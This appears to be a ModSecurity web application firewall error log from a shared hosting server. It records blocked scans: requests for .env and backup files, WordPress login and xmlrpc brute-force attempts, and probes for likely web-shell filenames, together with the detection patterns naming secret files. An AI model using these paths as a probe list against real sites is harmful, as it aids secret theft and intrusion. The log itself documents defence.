[Tue May 26 18:06:01.847616 2026] [security2:error] [pid 960743:tid 960967] [client 5.255.120.167:49166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/.env.bak"] [unique_id "ahWTsfQvEln_BHBy2zJ88AAAAOM"]
[Tue May 26 18:06:01.971912 2026] [security2:error] [pid 960743:tid 960888] [client 5.255.120.167:48844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/api/.env"] [unique_id "ahWTsfQvEln_BHBy2zJ8_gAAAJQ"]
[Tue May 26 18:06:02.113941 2026] [security2:error] [pid 960743:tid 960941] [client 5.255.120.167:49190] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/backend/.env"] [unique_id "ahWTsvQvEln_BHBy2zJ9CAAAAMk"]
[Tue May 26 18:06:02.122361 2026] [security2:error] [pid 960743:tid 960931] [client 5.255.120.167:49206] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/public/.env"] [unique_id "ahWTsvQvEln_BHBy2zJ9CQAAAL8"]
[Tue May 26 18:06:02.136906 2026] [security2:error] [pid 960743:tid 960811] [remote 92.205.109.21:56628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWTsfQvEln_BHBy2zJ8_QAA2kM"]
[Tue May 26 18:06:02.559565 2026] [security2:error] [pid 960743:tid 960815] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-sing.php"] [unique_id "ahWTsvQvEln_BHBy2zJ9IgAA3Ec"]
[Tue May 26 18:06:02.559873 2026] [security2:error] [pid 960743:tid 960960] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-sing.php"] [unique_id "ahWTsvQvEln_BHBy2zJ9IgAA3Ec"]
[Tue May 26 18:06:02.652594 2026] [security2:error] [pid 960743:tid 960947] [client 82.76.238.33:50199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTsvQvEln_BHBy2zJ9IwAAAM8"]
[Tue May 26 18:06:02.652809 2026] [security2:error] [pid 960743:tid 960947] [client 82.76.238.33:50199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTsvQvEln_BHBy2zJ9IwAAAM8"]
[Tue May 26 18:06:02.769165 2026] [security2:error] [pid 960743:tid 960816] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-links-opml.php"] [unique_id "ahWTsvQvEln_BHBy2zJ9KgAAzEg"]
[Tue May 26 18:06:02.769401 2026] [security2:error] [pid 960743:tid 960944] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-links-opml.php"] [unique_id "ahWTsvQvEln_BHBy2zJ9KgAAzEg"]
[Tue May 26 18:06:02.982872 2026] [security2:error] [pid 960743:tid 960846] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/edit.php"] [unique_id "ahWTsvQvEln_BHBy2zJ9OwAA9mY"]
[Tue May 26 18:06:02.983146 2026] [security2:error] [pid 960743:tid 960986] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/edit.php"] [unique_id "ahWTsvQvEln_BHBy2zJ9OwAA9mY"]
[Tue May 26 18:06:03.184553 2026] [security2:error] [pid 960743:tid 960818] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wmore1.php"] [unique_id "ahWTs_QvEln_BHBy2zJ9RAAAlEo"]
[Tue May 26 18:06:03.184760 2026] [security2:error] [pid 960743:tid 960888] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wmore1.php"] [unique_id "ahWTs_QvEln_BHBy2zJ9RAAAlEo"]
[Tue May 26 18:06:03.258887 2026] [security2:error] [pid 960743:tid 960881] [client 5.255.120.167:49166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "ameritradeng.com"] [uri "/.env.backup"] [unique_id "ahWTs_QvEln_BHBy2zJ9TQAAAI0"]
[Tue May 26 18:06:03.394115 2026] [security2:error] [pid 960743:tid 960848] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-access.php"] [unique_id "ahWTs_QvEln_BHBy2zJ9WwAA6Wg"]
[Tue May 26 18:06:03.394303 2026] [security2:error] [pid 960743:tid 960973] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-access.php"] [unique_id "ahWTs_QvEln_BHBy2zJ9WwAA6Wg"]
[Tue May 26 18:06:03.432443 2026] [security2:error] [pid 960743:tid 960913] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTsvQvEln_BHBy2zJ9OgAAAK0"]
[Tue May 26 18:06:03.459388 2026] [security2:error] [pid 960743:tid 960874] [client 185.192.70.92:58815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/autoload_classmap/function.php"] [unique_id "ahWTs_QvEln_BHBy2zJ9XAAAAIY"]
[Tue May 26 18:06:03.643980 2026] [security2:error] [pid 960743:tid 960974] [client 114.119.160.248:28455] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/our-certifications"] [unique_id "ahWTs_QvEln_BHBy2zJ9YgAAAOo"], referer: http://rohiniventures.com/pages/
[Tue May 26 18:06:03.863810 2026] [security2:error] [pid 960743:tid 960847] [remote 20.206.111.149:0] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "kingsclub.in"] [uri "/1.php"] [unique_id "ahWTs_QvEln_BHBy2zJ9dgAAp2c"]
[Tue May 26 18:06:03.863899 2026] [security2:error] [pid 960743:tid 960847] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/1.php"] [unique_id "ahWTs_QvEln_BHBy2zJ9dgAAp2c"]
[Tue May 26 18:06:03.864044 2026] [security2:error] [pid 960743:tid 960907] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/1.php"] [unique_id "ahWTs_QvEln_BHBy2zJ9dgAAp2c"]
[Tue May 26 18:06:05.095064 2026] [security2:error] [pid 960743:tid 960861] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/sbhu.php"] [unique_id "ahWTtfQvEln_BHBy2zJ9wwAA5HU"]
[Tue May 26 18:06:05.095281 2026] [security2:error] [pid 960743:tid 960968] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/sbhu.php"] [unique_id "ahWTtfQvEln_BHBy2zJ9wwAA5HU"]
[Tue May 26 18:06:05.300738 2026] [security2:error] [pid 960743:tid 960859] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/bgymj.php"] [unique_id "ahWTtfQvEln_BHBy2zJ9ygAAtHM"]
[Tue May 26 18:06:05.300992 2026] [security2:error] [pid 960743:tid 960920] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/bgymj.php"] [unique_id "ahWTtfQvEln_BHBy2zJ9ygAAtHM"]
[Tue May 26 18:06:05.490734 2026] [security2:error] [pid 960743:tid 960866] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/file30.php"] [unique_id "ahWTtfQvEln_BHBy2zJ90wAA93o"]
[Tue May 26 18:06:05.490898 2026] [security2:error] [pid 960743:tid 960987] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/file30.php"] [unique_id "ahWTtfQvEln_BHBy2zJ90wAA93o"]
[Tue May 26 18:06:05.707491 2026] [security2:error] [pid 960743:tid 960856] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/yellow.php"] [unique_id "ahWTtfQvEln_BHBy2zJ91wAAk3A"]
[Tue May 26 18:06:05.707711 2026] [security2:error] [pid 960743:tid 960887] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/yellow.php"] [unique_id "ahWTtfQvEln_BHBy2zJ91wAAk3A"]
[Tue May 26 18:06:05.900480 2026] [security2:error] [pid 960743:tid 960867] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/reze.php"] [unique_id "ahWTtfQvEln_BHBy2zJ94wABAHs"]
[Tue May 26 18:06:05.900640 2026] [security2:error] [pid 960743:tid 960862] [remote 92.205.109.21:56628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWTtfQvEln_BHBy2zJ93wAAjXY"], referer: https://yndglobal.com/wp-login.php
[Tue May 26 18:06:05.900725 2026] [security2:error] [pid 960743:tid 960996] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/reze.php"] [unique_id "ahWTtfQvEln_BHBy2zJ94wABAHs"]
[Tue May 26 18:06:06.061963 2026] [security2:error] [pid 960743:tid 960894] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTtfQvEln_BHBy2zJ91gAAAJo"]
[Tue May 26 18:06:06.130949 2026] [security2:error] [pid 960743:tid 960869] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wefile.php"] [unique_id "ahWTtvQvEln_BHBy2zJ95QAA-X0"]
[Tue May 26 18:06:06.131149 2026] [security2:error] [pid 960743:tid 960989] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wefile.php"] [unique_id "ahWTtvQvEln_BHBy2zJ95QAA-X0"]
[Tue May 26 18:06:06.373537 2026] [security2:error] [pid 960743:tid 960746] [remote 95.163.221.139:39928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.221.163.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTtvQvEln_BHBy2zJ96QAA9AI"]
[Tue May 26 18:06:06.373857 2026] [security2:error] [pid 960743:tid 960966] [client 173.249.2.74:62123] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWTtfQvEln_BHBy2zJ93gAAAOI"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 18:06:06.380325 2026] [security2:error] [pid 960743:tid 960747] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xda.php"] [unique_id "ahWTtvQvEln_BHBy2zJ97wAA_QM"]
[Tue May 26 18:06:06.380479 2026] [security2:error] [pid 960743:tid 960993] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/xda.php"] [unique_id "ahWTtvQvEln_BHBy2zJ97wAA_QM"]
[Tue May 26 18:06:06.587368 2026] [security2:error] [pid 960743:tid 960871] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/revealability.php"] [unique_id "ahWTtvQvEln_BHBy2zJ99gABBH8"]
[Tue May 26 18:06:06.587608 2026] [security2:error] [pid 960743:tid 961000] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/revealability.php"] [unique_id "ahWTtvQvEln_BHBy2zJ99gABBH8"]
[Tue May 26 18:06:06.940267 2026] [security2:error] [pid 960743:tid 960908] [client 185.192.70.82:64133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 82.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/item.php"] [unique_id "ahWTtvQvEln_BHBy2zJ-CQAAAKg"]
[Tue May 26 18:06:07.510379 2026] [security2:error] [pid 960743:tid 960749] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/forbidals.php"] [unique_id "ahWTt_QvEln_BHBy2zJ-HQAAowU"]
[Tue May 26 18:06:07.510565 2026] [security2:error] [pid 960743:tid 960903] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/forbidals.php"] [unique_id "ahWTt_QvEln_BHBy2zJ-HQAAowU"]
[Tue May 26 18:06:07.713931 2026] [security2:error] [pid 960743:tid 960748] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/i.php"] [unique_id "ahWTt_QvEln_BHBy2zJ-IQAA1AQ"]
[Tue May 26 18:06:07.714090 2026] [security2:error] [pid 960743:tid 960952] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/i.php"] [unique_id "ahWTt_QvEln_BHBy2zJ-IQAA1AQ"]
[Tue May 26 18:06:07.857284 2026] [security2:error] [pid 960743:tid 960752] [remote 95.163.221.139:39928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.221.163.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTt_QvEln_BHBy2zJ-JQAAwgg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:06:07.927706 2026] [security2:error] [pid 960743:tid 960756] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/900.php"] [unique_id "ahWTt_QvEln_BHBy2zJ-JwAArgw"]
[Tue May 26 18:06:07.927912 2026] [security2:error] [pid 960743:tid 960914] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/900.php"] [unique_id "ahWTt_QvEln_BHBy2zJ-JwAArgw"]
[Tue May 26 18:06:08.137378 2026] [security2:error] [pid 960743:tid 960757] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/kj.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-NAAA2A0"]
[Tue May 26 18:06:08.137607 2026] [security2:error] [pid 960743:tid 960956] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/kj.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-NAAA2A0"]
[Tue May 26 18:06:08.335990 2026] [security2:error] [pid 960743:tid 960755] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wuasr.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-NgAAhQs"]
[Tue May 26 18:06:08.336192 2026] [security2:error] [pid 960743:tid 960873] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wuasr.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-NgAAhQs"]
[Tue May 26 18:06:08.559926 2026] [security2:error] [pid 960743:tid 960753] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/t.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-QQAAlgk"]
[Tue May 26 18:06:08.560095 2026] [security2:error] [pid 960743:tid 960890] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/t.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-QQAAlgk"]
[Tue May 26 18:06:08.749312 2026] [security2:error] [pid 960743:tid 960754] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/class-t.api.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-RgAAoAo"]
[Tue May 26 18:06:08.749597 2026] [security2:error] [pid 960743:tid 960900] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/class-t.api.php"] [unique_id "ahWTuPQvEln_BHBy2zJ-RgAAoAo"]
